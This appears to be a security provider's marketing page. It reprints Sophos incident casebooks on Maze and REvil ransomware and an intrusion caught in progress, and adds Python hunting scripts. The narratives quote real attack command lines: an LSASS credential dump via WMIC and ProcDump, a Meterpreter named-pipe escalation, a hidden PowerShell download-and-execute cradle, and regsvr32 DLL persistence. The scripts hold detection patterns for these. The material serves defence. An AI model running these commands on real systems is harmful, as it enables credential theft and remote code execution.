Human led cyber attacks require human led threat hunting

Let's take a proactive approach to incident response together. 24/7 Threat hunting, detection, and response delivered by an expert team as a fully-managed service.


Attacks are up and their complexity and impact are increasing

Stories of organisations crippled by ransomware regularly dominate the IT news headlines, and accounts of six-and seven-figure ransom demands are commonplace. But, do the news stories tell the full story?

To understand the reality behind the headlines, Spear Shield's partner Sophos commissioned an independent survey of 5,000 IT managers across 26 countries. The key findings are summarised below:

  • Ransomware hit-rate

  • Ransomware cost of recovery

  • Extortion tactics

  • Threat Discovery

66% of organisations were hit by ransomware in the last year, up from 27% in 2020.

This is a 78% increase over the course of a year, demonstrating that adversaries have become considerably more capable at executing the most significant attacks at scale. This likely also reflects the growing success of the Ransomware-as-a-Service model which significantly extends the reach of ransomware by reducing the skill level required to deploy an attack.

Threefold increase in the proportion of victims paying ransoms of £1 million or more: up from 4% in 2020 to 11% in 2021.

In parallel, the percentage paying less than £10,000 dropped from one in three (34%) in 2020 to one in five (21%) in 2021.

Overall, the average ransom payment came in at £812,360, a 4.8X increase from the 2020 average of £170K (based on 282 respondents).

Ransomware operators do not just target systems and data, they target people.

Below are the top 10 pressure tactics that adversaries used in 2021:

1. Stealing data and threatening to publish or auction it online
2. Emailing and calling employees, including senior executives, threatening to reveal their personal information
3. Notifying or threatening to notify business partners, customers, the media, and more of the data breach
4. Silencing victims
5. Recruiting insiders
6. Resetting passwords
7. Phishing attacks targeting victim email accounts
8. Deleting online backups and shadow volume copies
9. Printing physical copies of the ransom note on all connected devices, including point of sale terminals
10. Launching distributed denial-of-service attacks against the target's website

17% of threats are in an organisation for an unknown amount of time before being discovered.

Cyber-attacks are multi-staged and co-ordinated, and they are now the norm: for example, a phishing email could install malicious code that exploits a software vulnerability to install ransomware or steal your credentials.


Gartner predicts by 2025 that 50% of organisations will be using MDR Services.

Your pain? We understand.

Few organisations have the right tools, people, and processes in-house to effectively manage their security programme around-the-clock whilst proactively defending against new and emerging threats.

As a result, organisations are increasingly looking towards managed detection and response (MDR) services to run their security operations programme.


Time, Resource & Visibility Challenges

The demands placed on IT and security teams by the business are heavy. Finding time to manage your cyber security can be difficult, and IT teams commonly feel that the budget for both people and technology is too low. Stretched internal resources and the wrong tool-set increase the time it takes to detect an active threat or data breach in your business. The industry average time to identify a data breach is one month or longer.


  • Lack of time
  • Lack of resources
  • Lack of visibility


Building an effective SecOps strategy with Spear Shield


In today's ever evolving threat landscape, modern cybersecurity programmes require the combination of three core capabilities: Protection, Detection, and Response.

Which option is best suited for my organisation?

Protection only does what it says on the tin.

XDR stands for Extended Detection and Response. XDR is used to hunt for latent or missed threats and respond to them. But somebody has to manage XDR...

MTR stands for Managed Threat Response, commonly known in the industry as MDR (Managed Detection and Response). It provides your organisation with 24/7/365 lead-less threat hunting.

Rapid Response is a dedicated incident response service for 'in an emergency, please break glass' P1/P2 type scenarios.


Did you know... 48% of organisations already incorporate human-led threat hunts, and the other 48% plan to incorporate human-led threat hunts within the next year?


Managed Threat Response Team & Service Overview

The MTR Ops team is made up of security professionals: analysts, engineers, ethical hackers, data scientists, specialists, and inventors. Backgrounds include armed forces, law enforcement, intelligence, public and private enterprise.

High-Fidelity Detections

Going beyond traditional detections, the MTR service combines deterministic and machine learning models to spot suspicious behaviours and the tactics, techniques and procedures used by the most advanced adversaries.

Proactive Defence

The service combines threat intelligence with newly-discovered Indicators of Compromise (IoC) and Indicators of Attack (IoA) identified through analyst-led threat hunts, to proactively protect your environment.

Transparency and Control

You own the decisions and control how and when potential incidents are escalated, what response actions (if any) you want the MTR service to take and who should be included in communications.

A Proactive Approach to Incident Response

Every second counts during an attack. When an incident is confirmed, a dedicated threat response lead is provided to directly work with your internal resource until the active threat is neutralised.

Weekly/Monthly Activity Reporting

Provide assurance to your organisation with weekly and monthly activity reporting. Exec-level ready reports mapped to the MITRE ATT&CK Framework.

24/7 Leadless Threat Hunting

Applying data science, threat intelligence, and the intuition of veteran threat hunters, we combine your company profile, high-value assets, and high-risk users to anticipate attacker behaviour and identify new Indicators of Attack (IoA).

“Winner: Best Managed Security Services Offering.”


The investigative framework process follows the iterative nature of the OODA Loop (Observe, Orient, Decide, Act).


What would the MTR Service look like in action?

To illustrate the range of the MTR Service when it comes to Threat Detection and Response, please find a breakdown split into three key scenarios.


Gaining that extra member in your team

Fully interchangeable response modes, all included at no additional cost. Decide the best way for the MTR Ops team to work alongside you.

  • We notify you about the detection and provide details to help you with prioritisation and response.
  • We work with your internal team or external point(s) of contact to respond to the detection.
  • We handle containment and neutralisation actions and inform you of the action(s) taken.

Real-world prolific attacks, crushed!

Blocking a $15 million Maze ransomware attack

A real-world story from the Sophos Managed Threat Response team
Written by 

Customer profile: An organization with many hundreds of networked devices based in Asia Pacific.

The Sophos Managed Threat Response (MTR) team was called in to help an organization targeted with Maze ransomware. The attackers issued a ransom demand for US$15 million – if they had succeeded, this would have been one of the most expensive ransomware payments to date.

Background: Ransomware partners in crime

 Maze is one of the most notorious ransomware families, active since 2019 when it evolved from ChaCha ransomware. It was among the first to combine data encryption with information theft.

The operators behind Maze have recently started colluding with other ransomware groups, including LockBit, SunCrypt and Ragnar Locker, providing them with access to their platform for posting stolen victim data.

This appears to have led to a reciprocal sharing of tactics, techniques and procedures (TTPs): in the attack covered here the Maze group borrowed a Ragnar Locker technique that involves using virtual machines.

For detailed technical analysis of this collaboration between attackers read Maze attackers adopt Ragnar Locker virtual machine technique.

Days 1-3: The attack begins

Prior to the attack becoming active, the operators compromised a computer on the target’s network. This computer was then used as a ‘beach head’ in the network. On multiple occasions during the attack, the attackers connected from here to other computers over Remote Desktop Protocol (RDP).

On day three, the main part of the attack began. The attackers exploited a domain admin account with a weak password to take control of an unprotected Domain Controller (DC). They then spent several days moving across the network.

Using the legitimate network scanning tool Advanced IP Scanner to map the network, the attackers created lists of IP addresses to which they would later deploy ransomware. These included a list of the IP addresses of machines belonging to the target’s IT administrators.

The attackers’ attention then turned to the exfiltration of data.

They identified a file server and accessed it remotely over RDP using the compromised domain admin account. Using the legitimate archiving tools WinRar and 7zip, they started compressing folders located on it.

These archives were then copied back to the primary DC using the legitimate Total Commander FTP client that the attackers had installed on the file server.

The attackers tried to install the cloud storage application Mega on the DC. This was blocked as the target had added Mega to their blocked list using the application control capability in Sophos Intercept X endpoint protection. The attackers then switched to using the web-based version instead, uploading the compressed files.

Days 4-5: The calm before the storm

For two days, the attackers went quiet. It’s likely they were waiting for a day when the target’s IT security team wouldn’t be working, like the weekend.

Day 6: The first ransomware attack is launched

The first Maze ransomware attack was launched on a Sunday, using the already compromised domain admin account and the lists of IP addresses that had been identified.

This first attack actually comprised three attacks as the operators deployed three copies of the Maze ransomware via batch scripts to the targeted computers:

  • C:\ProgramData\enc6.exe
  • C:\ProgramData\enc.exe
  • C:\ProgramData\network.dll

Three scheduled tasks were created to execute the ransomware:

 Name                               Command
 Windows Update Security Patches    C:\ProgramData\enc6.exe
 Windows Update Security Patches 5  C:\ProgramData\enc.exe
 Windows Update Security            regsvr32.exe /i c:\programdata\network.dll


Over 700 computers were targeted in the attack, which was detected and blocked by Sophos Intercept X.
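To hunt for the persistence pattern above on your own estate, here is an added example (not Sophos or Spear Shield code) that audits the output of `schtasks /query /fo CSV /v`. The CSV sample is constructed with a subset of the real columns, and the list of user-writable directories is an assumption to tune for your own gold image.

```python
"""Audit scheduled tasks for the patterns seen in the Maze casebook.

Added example, not Sophos or Spear Shield code. It parses the CSV produced by
`schtasks /query /fo CSV /v` (the sample below is constructed and carries only
a subset of the real columns) and flags tasks that run from a user-writable
directory, load a DLL via regsvr32/rundll32 from such a directory, or carry a
name that imitates a vendor update job.
"""
import csv
import io
import re

# Directories an attacker can write to without admin rights. Assumption: your
# gold image schedules nothing from these paths, so anything here stands out.
WRITABLE_DIRS = ("c:\\programdata", "c:\\users\\", "c:\\windows\\temp", "\\appdata\\")

# LOLBins that turn a DLL into a scheduled-task payload (network.dll above).
DLL_LOADERS = ("regsvr32.exe", "rundll32.exe")

# Names that imitate legitimate update jobs, as in both Maze attempts.
LOOKALIKE_NAMES = re.compile(r"(windows update|security (patch|update)|chrome.*update)", re.I)


def first_path(command: str) -> str:
    """Return the executable path at the start of a 'Task To Run' value."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    return command.split(" ", 1)[0]


def audit_task(name: str, task_to_run: str) -> list:
    """Return the reasons (if any) that this one task looks suspicious."""
    reasons = []
    cmd_lower = task_to_run.lower()
    exe = first_path(cmd_lower)
    exe_name = exe.rsplit("\\", 1)[-1]
    if any(d in exe for d in WRITABLE_DIRS):
        reasons.append("T1053.005: executable launched from a user-writable directory")
    if exe_name in DLL_LOADERS and any(d in cmd_lower for d in WRITABLE_DIRS):
        reasons.append("T1053.005: %s loading a DLL from a user-writable directory" % exe_name)
    if LOOKALIKE_NAMES.search(name):
        reasons.append("task name imitates a vendor update job")
    return reasons


def audit_schtasks_csv(text: str) -> dict:
    """Map TaskName -> reasons for every suspicious task in schtasks CSV output."""
    findings = {}
    for row in csv.DictReader(io.StringIO(text)):
        reasons = audit_task(row["TaskName"], row["Task To Run"])
        if reasons:
            findings[row["TaskName"]] = reasons
    return findings


# Constructed sample: the three Maze tasks plus two benign ones.
SAMPLE_CSV = r'''"HostName","TaskName","Status","Author","Task To Run"
"DC01","\Windows Update Security Patches","Ready","CORP\admin","C:\ProgramData\enc6.exe"
"DC01","\Windows Update Security Patches 5","Ready","CORP\admin","C:\ProgramData\enc.exe"
"DC01","\Windows Update Security","Ready","CORP\admin","regsvr32.exe /i c:\programdata\network.dll"
"DC01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft","%windir%\system32\defrag.exe -c -h -o -$"
"DC01","\Corp\Backup","Ready","CORP\svc_backup","""C:\Program Files\Backup\backup.exe"" --nightly"
'''

if __name__ == "__main__":
    for task, reasons in audit_schtasks_csv(SAMPLE_CSV).items():
        print(task)
        for reason in reasons:
            print("   ", reason)
```

On a live host, pipe `schtasks /query /fo CSV /v` into `audit_schtasks_csv` and review every hit against your change records; the "Google Chrome Security Update" task from the second attempt trips the same checks.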

Either the attackers didn’t realize the attack had been blocked or they were hoping that the theft of the data would be enough for the target to pay up – but whatever the reason, upon launching the first attack attempt they issued a ransom demand for US$ 15 million.

Day 7: The MTR team gets to work

Realizing that they were under attack, the target’s security team engaged the advanced incident response skills of the Sophos MTR team. Since they were not yet a Sophos MTR customer, the Sophos Rapid Response team was first engaged. The team quickly identified the compromised admin account, identified and removed several malicious files, and blocked attacker commands and C2 (command and control) communications.

Day 8: Investigation and neutralization continue

Over the following hours the MTR team found further tools and techniques used by the attackers, as well as evidence relating to the exfiltration of data. More files and accounts were blocked.

Day 9: The second attack

The attackers launched a second attack via a different compromised account. This attack was similar to the first one: commands were executed on a DC, looping through the lists of IP addresses contained in txt files.

However, this time they copied a file called license.exe to C:\ProgramData.

This was followed by a scheduled task to execute it. In this attack attempt the task was called “Google Chrome Security Update”.

The attack was quickly identified and stopped. Intercept X detected the ransomware, and the MTR team disabled and deleted both the compromised account and the license.exe file. No files were encrypted.

Day 9: Third time lucky?

Just a few hours after the second attempt, the attackers tried again.

By now they seemed to be growing desperate. This attack targeted a single machine, the main file server that the exfiltrated data had been taken from, and used a completely different technique to the previous attacks.

In the third attempt, the attackers distributed the ransomware payload inside a virtual machine (VM).

Fortunately the MTR investigators recognized this new approach immediately as they had also responded to the Ragnar Locker ransomware attack where the technique was first seen.

The Maze operators had enhanced the technique, but it was undoubtedly the same. The attack was detected and stopped and no files were encrypted.

Defeating adversaries in human-led attacks

This casebook highlights how agile and adaptable human-operated attacks can be, with the attackers able to quickly substitute and reconfigure tools and return to the ring for another round.  It also demonstrates how, to minimize likelihood of detection, attackers take advantage of multiple legitimate IT tools in their attacks.

Sophos endpoint products detect components of this attack as Troj/Ransom-GAV or Troj/Swrort-EG. Indicators of compromise can be found on the SophosLabs Github.

What can defenders do?

The most important things an IT security team can do are to reduce the attack surface, implement strong security software (including specialist anti-ransomware protection), educate employees, and consider setting up or engaging a human threat hunting service to spot the clues that software can’t.

Any organization can be a ransomware target, and any spam or phishing email, exposed RDP port, vulnerable exploitable gateway device or stolen remote access credentials will be enough for such adversaries to gain a foothold.


The MITRE ATT&CK framework is a globally accessible knowledge base of known adversary tactics, techniques and procedures (TTPs). It can help security teams as well as threat hunters and analysts to better understand, anticipate and mitigate attacker behavior.

Initial Access

  • T1078.002 – Valid Accounts: Domain Accounts
  • T1133 – External Remote Services

Execution

  • T1059.001 – Command and Scripting Interpreter: PowerShell
  • T1059.003 – Command and Scripting Interpreter: Windows Command Shell
  • T1047 – Windows Management Instrumentation
  • T1053.005 – Scheduled Task/Job: Scheduled Task

Defense Evasion

  • T1564.006 – Hide Artifacts: Run Virtual Instance

Credential Access

Discovery

  • T1016 – System Network Configuration Discovery

Lateral Movement

  • T1021.001 – Remote Services: Remote Desktop Protocol
  • T1021.002 – Remote Services: SMB/Windows Admin Shares

Command & Control

  • T1071.001 – Application Layer Protocol: Web Protocols

Exfiltration

  • T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage

Impact

  • T1486 – Data Encrypted for Impact

Sophos Managed Threat Response and threat hunting

For more information on the Sophos MTR service, speak with one of the security experts at Spear Shield today.

If you prefer to conduct your own threat hunts Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Speak with the team at Spear Shield to start a 30-day no obligation trial today.

Hand-to-hand combat with REvil ransomware chasing a $2.5 million pay day

For four hours defenders were locked in live combat with the human adversaries orchestrating the attack.
Written by 

A few weeks ago, a mid-sized, 24/7 media company that had moved critical activities online during the pandemic found itself locked in live combat with REvil ransomware attackers determined to secure a multi-million-dollar pay-out. The attack failed, but the company has yet to fully recover.

In early June 2021, a detection of Cobalt Strike on the network of a mid-size media company triggered a security alert. Cobalt Strike is a remote access agent that is widely used by adversaries as a precursor to ransomware attack.

Attackers released ransomware a few hours later at 4 am local time. For the next four hours, the target’s IT team and Sophos’ Rapid Response team were locked in live combat with the human adversaries orchestrating the attack.

The attack ultimately failed, but not before the attackers encrypted the data on unprotected devices, deleted online backups, and decimated one online and undefended domain.

The ransom note left on encrypted devices demanded a payment of $2.5 million and was signed by REvil, also known as Sodinokibi.

How it began

REvil is a ransomware-as-a-service offering, which means that criminal customers can lease the malware from the developers and then use their own tools and resources to target and perform the attack. The target for this particular REvil customer was a media company with approximately 600 computing devices – 25 of them servers – and three Active Directory domains, which were critical to the company’s ability to maintain its 24/7 operations.

The rush to remote and online operations

Like so many organizations during the early stages of the COVID-19 pandemic, the target had rushed to equip and enable a remote workforce, and not all devices carried the same level of protection. The company also decided to internet-connect a network that was previously air-gapped. Unfortunately, these actions would come back to bite them.

Once the intruders were inside the network, they made straight for the unprotected devices and other online systems they could gain access to, installing their attack tools and using them to spread the attack to other devices.

The unfolding attack

When Sophos’ Rapid Response team arrived on the scene, they discovered that the attackers had already managed to compromise a number of accounts and had been able to move unimpeded between unprotected computers.

“One of the biggest challenges for incident response is a lack of visibility about what’s happening on unprotected devices,” said Paul Jacobs, incident response lead, Sophos. “We can see and block inbound attacks coming from these devices to a protected endpoint, but we can’t centrally remove the intruder from those devices or see what they’re up to.”

The team also looked at the software applications installed on devices to check for any that might be used as part of the attack.

“As a result of the pandemic, it’s not unusual to find remote access applications installed on employee devices,” said Jacobs. “When we saw Screen Connect on 130 endpoints, we assumed it was there intentionally to support people working from home. It turned out the company knew nothing about it – the attackers had installed the software to ensure they could maintain access to the network and compromised devices.”

This was just one of several mechanisms the attackers implemented to maintain persistence. The attackers also created their own domain admin account as a fallback after stealing another set of domain admin credentials.

Hand-to-hand combat

“As the attack became noisier, the attackers knew they would be detected and blocked. We could tell that they knew we were there, and they were doing everything they could to defeat us,” said Jacobs. “Our security products have a behavioral feature called CryptoGuard that detects and blocks attempts to encrypt files even if the source is a remote, unprotected device. Once we started to see such detections, we knew the ransomware had been unleashed and the battle was on.”

The attackers tried repeatedly to breach protected devices and encrypt files, launching attacks from different unprotected devices they had been able to compromise.

Every attempt needed to be blocked and investigated to ensure there was nothing else going on and that there was no further damage – even though by then the next attack attempt was already underway. This task was made harder than normal because the organization needed to keep most of its servers online to support the 24/7 broadcasting systems.

Eventually, the onslaught began to slow down. By day two, inbound attacks were still detected intermittently but it was clear the main attack attempt was over and had failed.

The aftermath

As the incident responders and the company’s IT security team took stock, they found that damage was mainly limited to the unprotected devices and domains. The previously air-gapped domain, now online, was completely destroyed and needed to be rebuilt, and online backups had been deleted, but the company wasn’t totally crippled by the attack, and it didn’t need to pay the exorbitant ransom. Despite this, the return to full operations has been a slow process and is ongoing at the time of publication.

The lessons learned

“In most cases, by the time we are called in the attack has already taken place, and we are there to help contain, neutralize and investigate the aftermath,” said Peter Mackenzie, manager of Sophos Rapid Response. “On this occasion we were there as the final stage of the attack unfolded and could see at first hand the determination and growing frustration of the attackers, who threw everything at us, from as many directions as they could.”

Sophos experts believe there are two important lessons defenders can take away from this incident:

  1. The first is about risk management. When you make changes to your environment, for example, changing a network from air-gapped to online as in the case of this business, your level of risk changes. New areas of vulnerability open up and IT security teams need to understand and address that
  2. The second is about preserving data. The first compromised account in this attack belonged to one of the IT team. All the data had been wiped and this meant that valuable information, such as details of the original breach, which could have been used for forensic analysis and investigation was lost. The more information is kept intact, the easier it is to see what happened and to ensure it can’t happen again


Sophos recommends the following best practices to help defend against REvil and other families of ransomware and related cyber-attacks:

  1. Monitor and respond to alerts – Ensure the appropriate tools, processes, and resources (people) are available to monitor, investigate and respond to threats seen in the environment. Ransomware attackers often time their strike during off-peak hours, at weekends or during the holidays, on the assumption that few or no staff are watching
  2. Set and enforce strong passwords – Strong passwords serve as one of the first lines of defense. Passwords should be unique or complex and never re-used. This is easier to do if you provide staff with a password manager that can store their credentials
  3. Multi Factor Authentication (MFA) – Even strong passwords can be compromised. Any form of multifactor authentication is better than none for securing access to critical resources such as e-mail, remote management tools, and network assets
  4. Lock down accessible services – Perform scans of your organization’s network from the outside and identify and lock down the ports commonly used by VNC, RDP, or other remote access tools. If a machine needs to be reachable using a remote management tool, put that tool behind a VPN or zero-trust network access solution that uses MFA as part of its login
  5. Segmentation and Zero-Trust – Separate critical servers from each other and from workstations by putting them into separate VLANs as you work towards a zero-trust network model
  6. Make offline backups of information and applications, keep them up to date and keep a copy offline
  7. Inventory your assets and accounts – Unprotected and unpatched devices in the network increase risk and create a situation where malicious activities could pass unnoticed. It is vital to have a current inventory of all connected computers and IoT devices. Use network scans and physical checks to locate and catalog them
  8. Install layered protection to block attackers at as many points as possible – and extend that security to all endpoints that you allow onto your network
  9. Product configuration – Under-protected systems and devices are vulnerable too. It is important that you ensure security solutions are configured properly and to check and, where necessary, update security policies regularly. New security features are not always enabled automatically
  10. Active Directory (AD) – Conduct regular audits on all accounts in AD, ensuring that none have more access than is needed for their purpose. Disable accounts for departing employees as soon as they leave the company
  11. Patch everything – Keep Windows and other software up to date. This also means double checking that patches have been installed correctly and, in particular, are in place for critical systems like internet-facing machines or domain controllers

Additional advice for security leadership

  1. Understand the tactics, techniques and procedures (TTPs) that attackers can use and how to spot the early warning signs of an imminent attack
  2. Have an incident response plan that is continuously reviewed and updated to reflect changes in your IT environment and business operations and how they impact your security posture and level of risk
  3. Turn to external support if you don’t have the resources or expertise in house to monitor activity on the network or respond to an incident. Ransomware is often unleashed at the end of an attack, so you need both dedicated anti-ransomware technology and human-led threat hunting to detect the tell-tale tactics, techniques, and procedures that indicate an attacker is in, or attempting to get into, the environment
  4. If you do get hit, there are incident response experts available 24/7 you can call on to contain and neutralize the attack

Technical information on the tactics, techniques and procedures (TTPs) used in this and other REvil attacks can be found in the following companion articles, What to Expect When You’ve Been Hit with REvil Ransomware, and Relentless REvil, Revealed: RaaS as Variable as the Criminals Who Use It.

An active adversary caught in the act

MTR Casebook: An active adversary caught in the act

A real-world story from the Sophos Managed Threat Response team
Written by 

Customer profile: A professional sports organization based in the USA, with approximately 800 devices.

The Sophos Managed Threat Response (MTR) team provides 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service.

The initial clue: A needle among the hay

In the hunt for suspicious events, the Sophos MTR team analyzes tens of millions of data points each day by leveraging threat intelligence, machine learning, and complex rule sets derived from the front-line experience that operators have gained from responding to threats day in, day out.

This analysis is done with the goal of finding signals that could potentially be an indicator of an attack. You can learn more about our Threat Detection and Response methodology in this blog post.

In this case, the signal was a legitimate Microsoft Sysinternals tool, ProcDump.exe – a tool typically used by developers to analyze running software processes and to write (or ‘dump’) their memory to disk so that it can be inspected. Developers find this tool very handy for figuring out why a bug is occurring.

Yet in this instance, ProcDump was attempting to export the memory space of lsass.exe. This raised alarm bells with the Sophos MTR operations team which monitors the customer environment 24/7.

LSASS is the Local Security Authority Subsystem Service in Microsoft Windows and it is responsible for enforcing security policy and handling logins to Windows systems. If one were to write its memory to disk, the usernames and passwords of users could be retrieved from it.

The Sophos MTR team had indeed spotted an indicator of attack. Someone was trying to steal credentials.

You may have heard of Mimikatz, a tool whose sole purpose is stealing passwords, hashes, security tokens, and so on. Adversaries sometimes avoid using this tool given its widespread detection by security products. But unlike Mimikatz, ProcDump has legitimate uses beyond the nefarious, and thus is rarely detected by security vendors.

Someone was trying to not get caught.

The investigation begins

A case was created the same minute as the signal was generated, and a Sophos MTR operator immediately began to investigate.

Attempted credential theft

The operator looked into the historic data gathered by our agent and found the process that caused the detection. The process was trying to invoke a command:

C:\Windows\system32\cmd.exe /C wmic /node:"SERVER NAME" process call create "C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp"

The command shows the Windows command-line interpreter cmd.exe invoking WMIC – the command-line interface to Windows Management Instrumentation (WMI). WMI is a tool for interacting with local and remote systems to get information and send them instructions.

Calling out to a remote server (redacted to SERVER NAME), the command was trying to tell the server to run ProcDump and write the LSASS process’ memory to disk.

Thankfully the MTR operator found no evidence that “lsass.dmp” was written to disk, and a review of their Sophos Central telemetry showed Sophos credential theft prevention technology successfully thwarted the adversary’s attempt.

But where did this command come from?

Attempted privilege escalation

The operator looked back up the process tree to find the parent of (i.e. what started) cmd.exe and found svchost.exe – the Windows Service Host that is used to run single processes and conserve computing resources.

The same instance of svchost also spawned another child process:

C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7

To the untrained eye, the above command doesn’t appear obviously malicious. Yet this is a common artifact that can be observed from the GetSystem function of Meterpreter.

The Meterpreter is a payload that gives an adversary interactive command-line access to a host and GetSystem is a script built into the Meterpreter that aids an adversary in gaining full system privileges by impersonating a named pipe – a technology to enable processes to communicate with one another.

Thankfully the named pipe they were trying to exploit didn’t exist on the system at that time.
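The two command lines above are exactly the kind of signal a hunter wants to match automatically. As an added example, not code from the Sophos casebook, the detection logic below flags both in process-creation telemetry; the events are constructed in the shape of Sysmon ProcessCreate fields, and the ATT&CK IDs that are not on this page (T1003.001, T1134.001) are the mappings I would assign.

```python
"""Flag the ProcDump-on-LSASS and named-pipe command lines in process telemetry.

Added example, not Sophos code. SAMPLE_EVENTS is constructed in the shape of
Sysmon event ID 1 (ProcessCreate) fields; adapt the keys to your EDR schema.
"""
import re

# ProcDump aimed at LSASS: "-ma lsass", an lsass.dmp output file, or lsass as
# the target name. A developer's "procdump -ma <pid>" is deliberately not flagged.
LSASS_DUMP = re.compile(r"procdump[^\n]*?(-ma\s+lsass|lsass\.dmp|\blsass\b)", re.I)

# Remote execution through WMIC, the way the dump was pushed to SERVER NAME.
WMIC_REMOTE = re.compile(r"\bwmic\b.*?/node:\S+.*?process\s+call\s+create", re.I)

# cmd.exe /c echo <hex> > \\.\pipe\<hex>: Meterpreter getsystem's named-pipe
# impersonation. Nothing legitimate echoes a random hex token into a pipe.
PIPE_ECHO = re.compile(
    r"cmd(\.exe)?\s+/c\s+echo\s+[0-9a-f]+\s*>\s*\\\\\.\\pipe\\[0-9a-f]+", re.I)


def classify(cmdline: str) -> list:
    """Return ATT&CK-tagged findings for one command line (empty if benign)."""
    findings = []
    if LSASS_DUMP.search(cmdline):
        findings.append("T1003.001 OS Credential Dumping: LSASS Memory (ProcDump)")
    if WMIC_REMOTE.search(cmdline):
        findings.append("T1047 Windows Management Instrumentation: remote process create")
    if PIPE_ECHO.search(cmdline):
        findings.append("T1134.001 Token Impersonation via named pipe (Meterpreter getsystem)")
    return findings


def hunt(events: list) -> list:
    """One finding per suspicious ProcessCreate event, keeping parent context."""
    hits = []
    for ev in events:
        findings = classify(ev["CommandLine"])
        if findings:
            hits.append({"pid": ev["ProcessId"], "parent_pid": ev["ParentProcessId"],
                         "parent": ev["ParentImage"], "findings": findings})
    return hits


def shared_parents(hits: list) -> dict:
    """Parent PIDs that spawned more than one flagged child. In the casebook a
    single svchost.exe launched both commands, which ties them to one implant."""
    by_parent = {}
    for h in hits:
        by_parent.setdefault(h["parent_pid"], []).append(h["pid"])
    return {p: kids for p, kids in by_parent.items() if len(kids) > 1}


# Constructed sample: the two casebook commands under one svchost.exe, plus a
# developer's legitimate ProcDump run and an unrelated process.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentProcessId": 1188, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /C wmic /node:"SERVER NAME" process call create '
                    r'"C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp"'},
    {"ProcessId": 4133, "ParentProcessId": 1188, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7"},
    {"ProcessId": 5001, "ParentProcessId": 900, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"procdump.exe -accepteula -ma 2240 C:\Temp\myapp.dmp"},
    {"ProcessId": 5002, "ParentProcessId": 900, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Git\bin\git.exe" status'},
]

if __name__ == "__main__":
    hits = hunt(SAMPLE_EVENTS)
    for h in hits:
        print(h["pid"], "spawned by", h["parent"], "->", "; ".join(h["findings"]))
    print("flagged children sharing a parent:", shared_parents(hits))
```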

Command and control

The adversary's use of Meterpreter indicated that they must have some kind of network connection over which to send commands to the compromised host.

Digging into the network logs, the MTR operator could see a large number of outbound connections to a Bulgarian IP address on network port 443.

Port 443 is typically used by HTTPS for securely connecting to websites, and adversaries commonly use this port to hide themselves among legitimate web traffic.

This discovery initiated a review of this Bulgarian-based IP. One of the ports it had open to the internet is port 50050. This port is an ephemeral port – one that cannot be registered with IANA and thus is not a common port used by well-known network services. However, the MTR operator had seen this port many times before.

Port 50050 is the default listening port for a Cobalt Strike listening server. Cobalt Strike is a “threat emulation” tool typically marketed to penetration testers to easily facilitate adversarial attacks and help organizations see their risk to breaches.

However, malicious threat actors have gotten their hands on this tool and use it to orchestrate real attacks on innocent victims.

Notifying the customer

Only minutes after the initial detection was made, the MTR operator completed the initial investigation and had high confidence that this was malicious adversarial activity.

Sophos MTR offers three modes of response to customers that they can switch between at any time:

Notify – Sophos conducts threat identification and investigation, informing the customer of the findings and offering the customer recommendations for how to respond to the threat themselves.

Collaborate – Sophos conducts threat identification and investigation, and collaborates on the response to the threat, dividing responsibility between the customer and the Sophos MTR team.

Authorize – Sophos conducts threat identification, investigation, and response and takes proactive action, informing the customer about what was detected and the response actions that were taken.

In this instance, the MTR customer was in Notify mode. The operator reached out to the customer via phone to discuss the discovery and to provide recommendations for how to respond to the immediate findings before the investigation continued.

The MTR operator shared the discoveries and the user accounts leveraged by the adversary. These accounts needed their passwords reset immediately to disable the adversary’s access. In addition to the phone call, all the details were provided in an email to be referenced while the customer took action.

Continuing the hunt

With the customer working on resetting the compromised accounts’ passwords, the MTR operator continued to follow the adversary’s journey across the customer’s network. At this point, no evidence had been found as to how they got inside.

Note that throughout the rest of this case, regular communication between the MTR operator and the customer took place via email.

Lurking in the cloud

Deeper analysis of the network traffic on the compromised host showed HTTPS traffic between the host and another that resided in the customer’s virtual private cloud (VPC), where they have a number of servers that face the public internet.

Diving into the logs of the server in the VPC, the MTR operator quickly spotted further GetSystem attempts and named pipe impersonation. However, all evidence pointed towards the already identified compromised hosts.

Additionally, execution of a PowerShell command (PowerShell being a scripting language built into Windows for task automation) was identified:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"

This one-line command reaches out to a URL and downloads and executes the payload it finds there. The URL points to the same Bulgarian IP on which the MTR team found the open Cobalt Strike port.


The MTR operator quickly reached out to SophosLabs, Sophos’ threat analysis, intelligence, and research division. Sharing the above command, the MTR operator asked for assistance with analyzing the payload hosted at that URL. Within a few minutes, SophosLabs shared their insights back with Sophos MTR.

Unfortunately, the payload in question was no longer present: seemingly taken down by the adversary shortly after they used it. SophosLabs promptly added the IP and the URL to the cloud intelligence platform that underpins all Sophos products and services so that any further use of that command and control server will be detected and blocked across all Sophos customers.

Finding the initial access

Finally, the MTR operator identified where the attack began. Continuing the analysis of the VPC server’s logs, Remote Desktop Protocol (RDP) communication to an unknown host was spotted within the VPC. This unknown host was not under management by Sophos MTR, nor could it be found in the customer’s Sophos Central account.

The operator reached out to the customer to ask what this unknown host was and why it wasn’t under management.

It seems they decommissioned it too late. The adversary had laterally moved from the original compromised host to another and executed the PowerShell command. This gave them remote access to a new host in the event they lost their access via RDP.

This turned out to be a smart move by the adversary, as this is exactly what happened.

RDP servers far too often face the public internet, making them a prime target of adversaries looking to break into networks. Once inside, RDP is a noisy and visual method of remote access: a cursor moving on the screen is somewhat of a giveaway.

